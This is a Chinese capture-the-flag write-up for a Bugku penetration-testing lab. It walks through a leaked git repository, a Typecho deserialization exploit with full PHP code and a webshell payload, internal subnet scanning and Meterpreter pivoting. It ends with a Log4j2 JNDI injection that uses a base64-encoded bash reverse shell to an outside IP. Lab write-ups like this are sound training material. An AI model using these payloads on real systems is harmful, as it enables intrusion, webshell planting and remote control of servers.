bugku的PAR-渗透测试2
渗透测试2 未解决
FLAG数: 9
描 述: 小明在一次渗透测试中进入了某网站的后台但没有继续进行下去的思路了,你能帮帮Ta吗?
开局一个地址http://106.14.195.228:80

发现存在git源码泄露

C:\Users\25963\Desktop\GitHack-master>python GitHack.py -u http://106.14.195.228/.git/
[+] Download and parse index file ...
[+] LICENSE
[+] README.md
[+] index.php
[+] logo.png
[+] phpinfo.php
[OK] README.md
[OK] LICENSE
[OK] phpinfo.php
[OK] index.php
[OK] logo.png
扫目录结果
[02:27:19] 301 - 314B - /.git -> http://106.14.195.228/.git/
[02:27:19] 200 - 599B - /.git/
[02:27:19] 200 - 272B - /.git/config
[02:27:19] 200 - 23B - /.git/HEAD
[02:27:19] 200 - 413B - /.git/branches/
[02:27:19] 200 - 73B - /.git/description
[02:27:19] 200 - 595B - /.git/hooks/
[02:27:19] 200 - 400B - /.git/index
[02:27:19] 200 - 240B - /.git/info/exclude
[02:27:19] 200 - 459B - /.git/info/
[02:27:19] 200 - 191B - /.git/logs/HEAD
[02:27:19] 200 - 481B - /.git/logs/
[02:27:19] 301 - 324B - /.git/logs/refs -> http://106.14.195.228/.git/logs/refs/
[02:27:19] 301 - 330B - /.git/logs/refs/heads -> http://106.14.195.228/.git/logs/refs/heads/
[02:27:19] 200 - 191B - /.git/logs/refs/heads/master
[02:27:19] 301 - 332B - /.git/logs/refs/remotes -> http://106.14.195.228/.git/logs/refs/remotes/
[02:27:19] 200 - 191B - /.git/logs/refs/remotes/origin/HEAD
[02:27:19] 200 - 107B - /.git/packed-refs
[02:27:19] 200 - 543B - /.git/objects/
[02:27:19] 301 - 325B - /.git/refs/heads -> http://106.14.195.228/.git/refs/heads/
[02:27:19] 200 - 41B - /.git/refs/heads/master
[02:27:19] 301 - 327B - /.git/refs/remotes -> http://106.14.195.228/.git/refs/remotes/
[02:27:19] 301 - 334B - /.git/refs/remotes/origin -> http://106.14.195.228/.git/refs/remotes/origin/
[02:27:19] 200 - 32B - /.git/refs/remotes/origin/HEAD
[02:27:19] 301 - 324B - /.git/refs/tags -> http://106.14.195.228/.git/refs/tags/
[02:27:19] 200 - 473B - /.git/refs/
[02:27:26] 301 - 315B - /admin -> http://106.14.195.228/admin/
[02:27:26] 302 - 0B - /admin/ -> http://106.14.195.228/admin/login.php?referer=http%3A%2F%2F106.14.195.228%2Fadmin%2F
[02:27:26] 200 - 0B - /admin/config.php
[02:27:27] 302 - 0B - /admin/index.php -> http://106.14.195.228/admin/login.php?referer=http%3A%2F%2F106.14.195.228%2Fadmin%2Findex.php
[02:27:27] 200 - 2KB - /admin/login.php
[02:27:38] 200 - 0B - /config.inc.php
[02:27:48] 301 - 317B - /install -> http://106.14.195.228/install/
[02:27:48] 200 - 0B - /install.php
[02:27:48] 200 - 0B - /install.php?profile=default
[02:27:48] 200 - 530B - /install/
[02:27:50] 200 - 10KB - /LICENSE
[02:27:50] 200 - 6KB - /license
[02:27:50] 200 - 6KB - /license.txt
[02:27:51] 200 - 14KB - /logo
[02:27:57] 200 - 18KB - /phpinfo.php
[02:28:01] 200 - 79B - /README.md
[02:28:12] 301 - 313B - /usr -> http://106.14.195.228/usr/
[02:28:12] 200 - 484B - /usr/
[02:28:12] 301 - 313B - /var -> http://106.14.195.228/var/
[02:28:12] 200 - 618B - /var/
后台地址/admin/

Typecho1.0框架,存在CVE-2018-18753反序列化漏洞

exp:
<?php
class Typecho_Feed
{
const RSS1 = 'RSS 1.0';
const RSS2 = 'RSS 2.0';
const ATOM1 = 'ATOM 1.0';
const DATE_RFC822 = 'r';
const DATE_W3CDTF = 'c';
const EOL = "\n";
private $_type;
private $_items;
public function __construct(){
$this->_type = $this::RSS2;
$this->_items[0] = array(
'title' => '1',
'link' => '1',
'date' => 1508895132,
'category' => array(new Typecho_Request()),
'author' => new Typecho_Request(),
);
}
}
class Typecho_Request
{
private $_params = array();
private $_filter = array();
public function __construct(){
$this->_params['screenName'] = 'echo "<?php @eval(\$_POST[1]);?>" > 1.php';
$this->_filter[0] = 'system';
}
}
$exp = array(
'adapter' => new Typecho_Feed(),
'prefix' => 'typecho_'
);
echo base64_encode(serialize($exp));
?>
//YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjQxOiJlY2hvICI8P3BocCBAZXZhbChcJF9QT1NUWzFdKTs/PiIgPiAxLnBocCI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJzeXN0ZW0iO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjQxOiJlY2hvICI8P3BocCBAZXZhbChcJF9QT1NUWzFdKTs/PiIgPiAxLnBocCI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJzeXN0ZW0iO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30=
get:http://47.102.44.129/install.php?finish=a
post:
__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjQxOiJlY2hvICI8P3BocCBAZXZhbChcJF9QT1NUWzFdKTs/PiIgPiAxLnBocCI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJzeXN0ZW0iO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjQxOiJlY2hvICI8P3BocCBAZXZhbChcJF9QT1NUWzFdKTs/PiIgPiAxLnBocCI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJzeXN0ZW0iO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30=

根目录得到flag1:flag{e0d9924caeecfabdb07b9c90fb60e959}

mysql数据库弱口令


得到flag2:flag{aa5c89083bd3836e7c86ef0a2d8681fa}
同时得到后台管理员账密admin/$P$BfY8rUZyXxJy5AeWCVphCYzYR3tZ9I1,这个密码加密了,加密规则没找,已经shell了就不管这台机子了,上传fscan扫下C段
192.168.0.2:3306 open
192.168.0.2:80 open
[*] WebTitle: http://192.168.0.2 code:200 len:3392 title:Harry's Blog
[+] mysql:192.168.0.2:3306:root
192.168.0.2:3306 open
192.168.0.3:80 open
192.168.0.2:80 open
192.168.0.1:80 open
192.168.0.1:22 open
[*] WebTitle: http://192.168.0.1 code:200 len:3392 title:Harry's Blog
[*] WebTitle: http://192.168.0.2 code:200 len:3392 title:Harry's Blog
[*] WebTitle: http://192.168.0.3 code:200 len:4789 title:Bugku后台管理系统
[+] mysql:192.168.0.2:3306:root
生成msf马搭建代理

添加路由
meterpreter > run autoroute -s 192.168.0.0
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.0.0/255.255.255.0...
[+] Added route to 192.168.0.0/255.255.255.0 via 106.14.195.228
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
192.168.0.0 255.255.255.0 Session 1
成功代理访问192.168.0.3

扫目录没发现啥
发现msf的代理有个缺点就是不能流量太多,要不然会话直接死掉,这里还是换成frp来扫目录吧,扫目录这种流量太多,msf就坏掉了
抓登录的包发现有个提示Source:
访问下载源码发现是java

Log4j2CtfApplication.java
package com.example.log4j2ctf;
import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
@SpringBootApplication
public class Log4j2CtfApplication {
public static void main(String[] args) {
SpringApplication.run(Log4j2CtfApplication.class, args);
}
}
DamnVulnerableLog4j.jav
package com.example.log4j2ctf.controller;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RestController;
import javax.servlet.http.HttpServletResponse;
@RestController
public class DamnVulnerableLog4j {
private final Logger logger = LoggerFactory.getLogger(this.getClass());
private int count = 0;
@PostMapping("/login")
public String login(String user, String pwd, HttpServletResponse response) {
response.addHeader("Source", "/source.zip");
/*
*
*
*/
logger.info("用户登录失败,用户名不存在:" + user);
return "用户名或密码错误,次数 " + (count++);
}
}
根据文件名不难想到是log4j2漏洞

用户名地方能够拼接rmi,idap注入,同时在依赖包里能发现利用springboot相关框架

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84MS43MC4yNDEuMjExLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "81.70.241.211"

${jndi:rmi://81.70.241.211:1099/igsfwb}


flag4:flag{a98b304c5ce272cd586da15874ef4e79}
/root/flag
flag5:flag{2a57c5c9e6b970f674b33b574ee30db5}

/proc/self/environ
flag3:flag{e0f92293345ebeb6687d93341afcf402}

多网卡主机,存在其他段
root@44e217274d66:/# ip add
ip add
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
9: eth0@if10: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:c0:a8:00:03 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 192.168.0.3/24 brd 192.168.0.255 scope global eth0
valid_lft forever preferred_lft forever
15: eth1@if16: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:c0:a8:01:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet 192.168.1.2/24 brd 192.168.1.255 scope global eth1
valid_lft forever preferred_lft forever
先给msf来个shell

继续加路由

服务器太垃圾,,,把服务器内存干爆了,有机会再打吧